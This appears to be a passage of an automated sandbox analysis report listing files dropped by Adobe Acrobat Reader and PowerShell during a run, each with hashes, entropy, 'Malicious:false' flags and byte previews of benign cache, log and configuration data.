                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:m+l4kC8RzYOCGLvHkWBGKuKjXKeRKVIJ/2NAJVKjXKLuVGH5kt1llh89lc3ORajs:msPYOFLvEWdrROk/RJUQNH6tyc3Me/S
                                                                                                                          MD5:D69C521A6EDF5C90620CD388787F11FB
                                                                                                                          SHA1:E9EF1C1DC83963BB00A7641C7327F730A8131246
                                                                                                                          SHA-256:9858A48444F084AC4E655FC179035E054761C0A51F25E37F08045A1DF11DE298
                                                                                                                          SHA-512:F811B282B6573775044D4D00AC7C8BB161066C96A9ACD12ED9EB3C333E65AD205894290DC93EE8E040436F9A3BED4F5CAA5078CDCB6B632D4C212B520DC6EE7D
                                                                                                                          Malicious:false
                                                                                                                          Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ..A..Eo...................................*"J1............9Q].8O.z....=..:.N.{....N{.A..Eo.................

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\temp-index

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1584
                                                                                                                          Entropy (8bit):5.106865078651592
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:iDpVJKP1NdTMhh/Cv7VPGVAzItVdPWGuWjBaHW:iDpVUdTIh/CB1sNPWDWj/
                                                                                                                          MD5:0B825A9E97DB0E62D8D7D5CBF794ED8A
                                                                                                                          SHA1:CE79EA5121B8A094D4FF58ECAC89AD8AC0BAE6E6
                                                                                                                          SHA-256:04BC2C51D8AE871CBE503FC0277269CCACF2047273F4038D5BF09130B2EC5FB5
                                                                                                                          SHA-512:C7B38D8B8BA17E4ABD841446EEF6E1DF2C71DA197CDE6559B7FABE12FBE67ED20CFBDE0D17A51AC856BF6BFCFBAE05A22B186E867057B4B4FC20E25D3EB5FB70
                                                                                                                          Malicious:false
                                                                                                                          Preview:(....Soy retne....@...................+.U.!..V@2?.../.........=....m..@2?.../.............D.4.@2?.../..........+.{..'@2?.../.........A?.2:..@2?.../..........[.i..%.@2?.../..........o..k..@2?.../.........!...0.o@2?.../...........*....@2?.../..........u\]..q@2?.../..............q.@2?.../.........?..7X.L@2?.../............=...@2?.../.........,+..._.#@2?.../............P[. q@2?.../...........M.U...@2?.../.........=..(Q.x@2?.../...........3...@2?.../................@2?.../.............k7A.@2?.../.........:..N.A..@2?.../.............o.@2?.../.........Gy.'.h.@2?.../...........2q....@2?.../...........*..@2?.../.........F..=z;.@2?.../...........P....V@2?.../...........;.y~A.@2?.../..........v...q..@2?.../..........$..+I..@2?.../...........9.cmvd@2?.../...........a....../.../..............oB*../.../.........<...W..J../.../...........6<|...../.../.........t...$o..../.../..........K`C..B.../.../..........?....t../.../...........{C....../.../..........l..U~"%../.../.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1584
                                                                                                                          Entropy (8bit):5.106865078651592
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:iDpVJKP1NdTMhh/Cv7VPGVAzItVdPWGuWjBaHW:iDpVUdTIh/CB1sNPWDWj/
                                                                                                                          MD5:0B825A9E97DB0E62D8D7D5CBF794ED8A
                                                                                                                          SHA1:CE79EA5121B8A094D4FF58ECAC89AD8AC0BAE6E6
                                                                                                                          SHA-256:04BC2C51D8AE871CBE503FC0277269CCACF2047273F4038D5BF09130B2EC5FB5
                                                                                                                          SHA-512:C7B38D8B8BA17E4ABD841446EEF6E1DF2C71DA197CDE6559B7FABE12FBE67ED20CFBDE0D17A51AC856BF6BFCFBAE05A22B186E867057B4B4FC20E25D3EB5FB70
                                                                                                                          Malicious:false
                                                                                                                          Preview:(....Soy retne....@...................+.U.!..V@2?.../.........=....m..@2?.../.............D.4.@2?.../..........+.{..'@2?.../.........A?.2:..@2?.../..........[.i..%.@2?.../..........o..k..@2?.../.........!...0.o@2?.../...........*....@2?.../..........u\]..q@2?.../..............q.@2?.../.........?..7X.L@2?.../............=...@2?.../.........,+..._.#@2?.../............P[. q@2?.../...........M.U...@2?.../.........=..(Q.x@2?.../...........3...@2?.../................@2?.../.............k7A.@2?.../.........:..N.A..@2?.../.............o.@2?.../.........Gy.'.h.@2?.../...........2q....@2?.../...........*..@2?.../.........F..=z;.@2?.../...........P....V@2?.../...........;.y~A.@2?.../..........v...q..@2?.../..........$..+I..@2?.../...........9.cmvd@2?.../...........a....../.../..............oB*../.../.........<...W..J../.../...........6<|...../.../.........t...$o..../.../..........K`C..B.../.../..........?....t../.../...........{C....../.../..........l..U~"%../.../.........

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):291
                                                                                                                          Entropy (8bit):5.205917500304728
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HOkWM+q2PKJjq2nKuAl9OmbnIFUt8YOh1Zmw+YO3WMVkwOKJjq2nKuAl9OmbjLJ:7L+vqFHAahFUt89/+pLV5lFHAaSJ
                                                                                                                          MD5:2EFFB1799E64E449CBFF382E04725745
                                                                                                                          SHA1:1FFCE3CF5DC5C9BC9C91AB9F22184816D841469E
                                                                                                                          SHA-256:1B920431680D59C1EE01AA8FF7FB67EF399306D3BB1C6A9FB8B5C27680C97355
                                                                                                                          SHA-512:35661AEE741C307224E7CF19B4A3717CB49572D4C3E164231F455435C5759A8C8B528387BB3CABAF59C279C1EE7C4EEFB33CB8FF7C14039377DFE6C5E04C36D3
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/08-04:58:23.085 4ac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/08-04:58:23.086 4ac Recovering log #3.2024/11/08-04:58:23.086 4ac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):291
                                                                                                                          Entropy (8bit):5.205917500304728
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HOkWM+q2PKJjq2nKuAl9OmbnIFUt8YOh1Zmw+YO3WMVkwOKJjq2nKuAl9OmbjLJ:7L+vqFHAahFUt89/+pLV5lFHAaSJ
                                                                                                                          MD5:2EFFB1799E64E449CBFF382E04725745
                                                                                                                          SHA1:1FFCE3CF5DC5C9BC9C91AB9F22184816D841469E
                                                                                                                          SHA-256:1B920431680D59C1EE01AA8FF7FB67EF399306D3BB1C6A9FB8B5C27680C97355
                                                                                                                          SHA-512:35661AEE741C307224E7CF19B4A3717CB49572D4C3E164231F455435C5759A8C8B528387BB3CABAF59C279C1EE7C4EEFB33CB8FF7C14039377DFE6C5E04C36D3
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/08-04:58:23.085 4ac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/08-04:58:23.086 4ac Recovering log #3.2024/11/08-04:58:23.086 4ac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):338
                                                                                                                          Entropy (8bit):5.1771136728542375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HOvy+q2PKJjq2nKuAl9Ombzo2jMGIFUt8YOxXZmw+YOx3VkwOKJjq2nKuAl9OmbX:4y+vqFHAa8uFUt8/X/+/3V5lFHAa8RJ
                                                                                                                          MD5:2FD8CCB547EC6C7B6ABA4AEB80B2253B
                                                                                                                          SHA1:EE3D459B7A20AD64593AFCBB35C3383203D15222
                                                                                                                          SHA-256:0614117CE44A9E533F60B6796678FA9B6D32B5422E5F0A636E11B9C59DF06D40
                                                                                                                          SHA-512:4084F43977C1869DC3843E25940219BB784B7FED12E0585C35C59F8F90C4912AFD36AD62CF29817CFF9B22614285C199192AD10516AC0957AB1B1868824E66F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/08-04:58:23.043 144c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/08-04:58:23.046 144c Recovering log #3.2024/11/08-04:58:23.046 144c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):338
                                                                                                                          Entropy (8bit):5.1771136728542375
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HOvy+q2PKJjq2nKuAl9Ombzo2jMGIFUt8YOxXZmw+YOx3VkwOKJjq2nKuAl9OmbX:4y+vqFHAa8uFUt8/X/+/3V5lFHAa8RJ
                                                                                                                          MD5:2FD8CCB547EC6C7B6ABA4AEB80B2253B
                                                                                                                          SHA1:EE3D459B7A20AD64593AFCBB35C3383203D15222
                                                                                                                          SHA-256:0614117CE44A9E533F60B6796678FA9B6D32B5422E5F0A636E11B9C59DF06D40
                                                                                                                          SHA-512:4084F43977C1869DC3843E25940219BB784B7FED12E0585C35C59F8F90C4912AFD36AD62CF29817CFF9B22614285C199192AD10516AC0957AB1B1868824E66F1
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/08-04:58:23.043 144c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/08-04:58:23.046 144c Recovering log #3.2024/11/08-04:58:23.046 144c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\02f95613-bcf0-4db1-8178-23340b3ad1be.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):638
                                                                                                                          Entropy (8bit):4.919254325754546
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YH/udqcCa53am3RA8sq1tYsBdOg2HDfcaq3QYiuFP7E4T3y:Y2OaNasRdsuNdMHDu3QYhZ7nby
                                                                                                                          MD5:14CDFE6212FDC432E0E9BCCA046A41FD
                                                                                                                          SHA1:10BD84AB8DAA32B168FEABDFFDABF43D66BACF17
                                                                                                                          SHA-256:3F2DA3DD03E710CC32082C8405CD8F1DAD9712E078819F7F1A9C23EC2533A5DD
                                                                                                                          SHA-512:6CF7375BCAF28BC6C7D5D87588B4E231FDD5CBDEAB372A6327503BAAFFC8E8DFE48032758B9F97D87FC671EA2471B9057D62A9C95F88899D4EEAFF70A35F20FF
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ims-na1.adobelogin.com","supports_spdy":true},{"isolation":[],"server":"https://auth.services.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375619914519819","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":115745},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.11.30","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):638
                                                                                                                          Entropy (8bit):4.919254325754546
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:YH/udqcCa53am3RA8sq1tYsBdOg2HDfcaq3QYiuFP7E4T3y:Y2OaNasRdsuNdMHDu3QYhZ7nby
                                                                                                                          MD5:14CDFE6212FDC432E0E9BCCA046A41FD
                                                                                                                          SHA1:10BD84AB8DAA32B168FEABDFFDABF43D66BACF17
                                                                                                                          SHA-256:3F2DA3DD03E710CC32082C8405CD8F1DAD9712E078819F7F1A9C23EC2533A5DD
                                                                                                                          SHA-512:6CF7375BCAF28BC6C7D5D87588B4E231FDD5CBDEAB372A6327503BAAFFC8E8DFE48032758B9F97D87FC671EA2471B9057D62A9C95F88899D4EEAFF70A35F20FF
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ims-na1.adobelogin.com","supports_spdy":true},{"isolation":[],"server":"https://auth.services.adobe.com","supports_spdy":true},{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375619914519819","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":115745},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.11.30","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7902
                                                                                                                          Entropy (8bit):5.260366679457692
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:DA7Q1DHVjW8Mjx5mvQDWr3cOwNaZdgEIGiVl4WmzFllmzBpBrBOA+BZOqS:wmMVVjsKBZ
                                                                                                                          MD5:13B523C01567BD81562F919F3EE489E5
                                                                                                                          SHA1:0E818AFC0BFE7CC69466184ECC02E343510DD320
                                                                                                                          SHA-256:18C2FDF2653F36F97AFC91CB24F6710F452E3088977CB5D3F00E672A26FA597B
                                                                                                                          SHA-512:638B44D8C0E127903524D478DE5CC47AE8B131AF4A88EF7540742E265B89571593D0BAFE35DC820E54B350243E9B54394DFAFBB949FFF77BDD9F99C678F9AEBC
                                                                                                                          Malicious:false
                                                                                                                          Preview:*...#................version.1..namespace-<.(vo................next-map-id.1.Pnamespace-bc8b4a7d_831a_4032_842c_b8b7079c7dcd-https://rna-resource.acrobat.com/.0.<..r................next-map-id.2.Snamespace-654684f0_8f78_4bb8_a837_541f42dffef3-https://rna-v2-resource.acrobat.com/.1;..%r................next-map-id.3.Snamespace-87d29e40_c915_4b9e_9c75_4f190ff8ab1e-https://rna-v2-resource.acrobat.com/.2.O..o................next-map-id.4.Pnamespace-8384e241_5a21_4827_a227_cffab7048d44-https://rna-resource.acrobat.com/.3.*(.^...............Pnamespace-bc8b4a7d_831a_4032_842c_b8b7079c7dcd-https://rna-resource.acrobat.com/..6.r................next-map-id.5.Snamespace-6ee5bc14_ecd9_4b87_99ee_29bca57fcfd8-https://rna-v2-resource.acrobat.com/.4#.#.r................next-map-id.6.Snamespace-f7733574_734b_44e0_ab96_99189a114c8f-https://rna-v2-resource.acrobat.com/.5...o................next-map-id.7.Pnamespace-d4a0c64b_d367_4e54_8180_754b764659c7-https://rna-resource.acrobat.com/.6..<~a..............

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):326
                                                                                                                          Entropy (8bit):5.1896372585612385
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HO5G3+q2PKJjq2nKuAl9OmbzNMxIFUt8YOggXZmw+YOiNVkwOKJjq2nKuAl9Ombg:F+vqFHAa8jFUt86gX/+MV5lFHAa84J
                                                                                                                          MD5:0B3F1F5D2A6E99A7CCA272826BC0E4FB
                                                                                                                          SHA1:478A9BCFD3329D472092C24849E0B71B49EB90CB
                                                                                                                          SHA-256:57DB4F4375F110A73391751143325825FA5A566018320BB5F4B4CE4E42BEB0F9
                                                                                                                          SHA-512:C5C8332850CD0CC3FD5DC26E8DD7182E19E4383B6AD4CDEB1746C8C94CA92254B4A7DF099FFC2B376CA47BE8E75AF4947C5A543DC6226E6510C89C85F6334571
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/08-04:58:23.139 144c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/08-04:58:23.141 144c Recovering log #3.2024/11/08-04:58:23.142 144c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):326
                                                                                                                          Entropy (8bit):5.1896372585612385
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:HO5G3+q2PKJjq2nKuAl9OmbzNMxIFUt8YOggXZmw+YOiNVkwOKJjq2nKuAl9Ombg:F+vqFHAa8jFUt86gX/+MV5lFHAa84J
                                                                                                                          MD5:0B3F1F5D2A6E99A7CCA272826BC0E4FB
                                                                                                                          SHA1:478A9BCFD3329D472092C24849E0B71B49EB90CB
                                                                                                                          SHA-256:57DB4F4375F110A73391751143325825FA5A566018320BB5F4B4CE4E42BEB0F9
                                                                                                                          SHA-512:C5C8332850CD0CC3FD5DC26E8DD7182E19E4383B6AD4CDEB1746C8C94CA92254B4A7DF099FFC2B376CA47BE8E75AF4947C5A543DC6226E6510C89C85F6334571
                                                                                                                          Malicious:false
                                                                                                                          Preview:2024/11/08-04:58:23.139 144c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/08-04:58:23.141 144c Recovering log #3.2024/11/08-04:58:23.142 144c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\TESTING

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:e:e
                                                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                          Malicious:false
                                                                                                                          Preview:....

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1991
                                                                                                                          Entropy (8bit):5.059892687262478
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YFugEzeujPHkZj0SV3C2J12LSV3GaYAayrRVu9gyFsFw2dZhB+z1bSzrJsdhOG:YpE9/Apye3xRVg3JEZhB+z1O/Jsdt
                                                                                                                          MD5:4D3107CA2889C44CFF8C211E687429F7
                                                                                                                          SHA1:FDDB0F54645A74C967143211F6A4746755561082
                                                                                                                          SHA-256:28B008FF2C8ECFC8E7FBD038D061A5C7B8E2946D0E1AA9FE670ECCD217318399
                                                                                                                          SHA-512:778241E411CE525FCB21BE65EF54AA53197D0A24B211F9EBE2DB3023DA224F8ED5665123BC2B71EB07978C7CCB6DED0C34F3D54D2B5DA881C87D4755E7C4ED69
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1731059905000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"99b0905140bc0e830eb3b03021c363b6","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1726037466000},{"id":"DC_FirstMile_Home_View_Surface","info":{"dg":"1f79453dc8fd071dbb84dafda119dfe0","sid":"DC_FirstMile_Home_View_Surface"},"mimeType":"file","size":294,"ts":1726037459000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"4615716327ac07b50e5f8b7e5cd5e45d","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1726037459000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"5a71e66380a2882a2ccd25bbdbc1391d","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1726036922000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"25115111578320df30f13efb3cd093f3","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1726036922000},{"id":"DC_Reader_Edit_LHP_Banner","

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40887
                                                                                                                          Entropy (8bit):5.480223082781645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:cmYmhi/rU/wIBEb2Vz7Qi/M8Q1OAYeWBFOWBYNg7y:7Ymhi/rU/wIBkkvQi/zQ1OAYJ3Yyu
                                                                                                                          MD5:E671014EA4830B14C650D8A5E65BA5ED
                                                                                                                          SHA1:B8D71F2EB1F5F176AC49C1195381E23E7E85400B
                                                                                                                          SHA-256:080C35B49EAF700E49233A117409610B724B6F09B07223BD75C37C3D2B96BC3B
                                                                                                                          SHA-512:122B5FFEE217A8C364AEA775A231E8CF070F5B0434719DE039C82C8CD9B3DC338BF1CCDB7E67D434C5ECD2BF28E2E1EA0805482912841161B313C0373B9B1A02
                                                                                                                          Malicious:false
                                                                                                                          Preview:4.241.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2:o:..........:F:Arial-BoldItalicMT.P:Arial Bold Italic.L:$.........................."F:Arial.#.93.FID.2:o:..........:F:Arial-Black.P:Arial Black.L:-.........................."F:Arial Black.#.105.FID.2:o:..........:F:Bahnschrift.P:Bahnschrift Light.L:&...............,.........."F

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20010
                                                                                                                          Entropy (8bit):5.02483968322263
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:KiQ0HzAFbFXX359ib4DVVHWrxpUUpXoCwiopbjvwRjdvRlYfWkib45OvQJvOjJx:KinHzwZH3FVVHWrxpUUpXoCwiopbjoRd
                                                                                                                          MD5:07388C6CFA6BC904B45FA7E168B899FD
                                                                                                                          SHA1:AAA45F87E01D4C0684789D16B887A984FDDBC506
                                                                                                                          SHA-256:608907B69D3275653775ACFA2E4782294711F87979921D3E6557DEE6847F3035
                                                                                                                          SHA-512:44CAD5B149165FEFB23572E09E15FF5C162E96220E20E0D84B02AD73B0080E863C387BFF93B7C98BE79C49870B37C8F0E701D6D02648B2A4CD61E544EE9F15E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:PSMODULECACHE......wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Get-Date........Clear-Variable........Get-EventSubscriber........Import-Csv........Get-Variable........New-Variable........Compare-Object........New-TemporaryFile........Convert-String........New-Alias........Export-Csv........Get-Event........Set-TraceSource........ConvertTo-Csv........ConvertFrom-Json........Get-PSCallStack........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1760
                                                                                                                          Entropy (8bit):5.681223308954038
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:hSp4iiqbymI4RIoUeO+g9qr9tK8N0+5nOA+u0DlINqzKjlzc:AyYvIIfLY9qr2Kr5nOAlWlIpZw
                                                                                                                          MD5:BD5BD8A004209CD174006B9CCB8CD7FE
                                                                                                                          SHA1:CC8CAAC7B74A2D743CD5E14549463796D4809820
                                                                                                                          SHA-256:8AFE821DE3953223B3184BD7F0E219424790CA031C407A74C10ECBD3AA34E39A
                                                                                                                          SHA-512:B67935E8F4B12AD723008FD7C646CCDBDC32CEB37378F159E8B4A569E4EEC7225E42B17E5DA546DAB1881677E169973BFBDB95581715F3A56A48BB34EBAF40B5
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........R....................................@..........@................P....bG....zI..........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0..................)W_tD...B..T.........System..4...............-..Q...H..g............System.Core.D................g$H..K..I.............System.Management.Automation<.................YS.eE..9.G...........System.Management...@...............8Ak....G.......j........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4................x..:.9@.N4Jgf..........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                          C:\Users\user\AppData\Local\Temp\RES8A4C.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
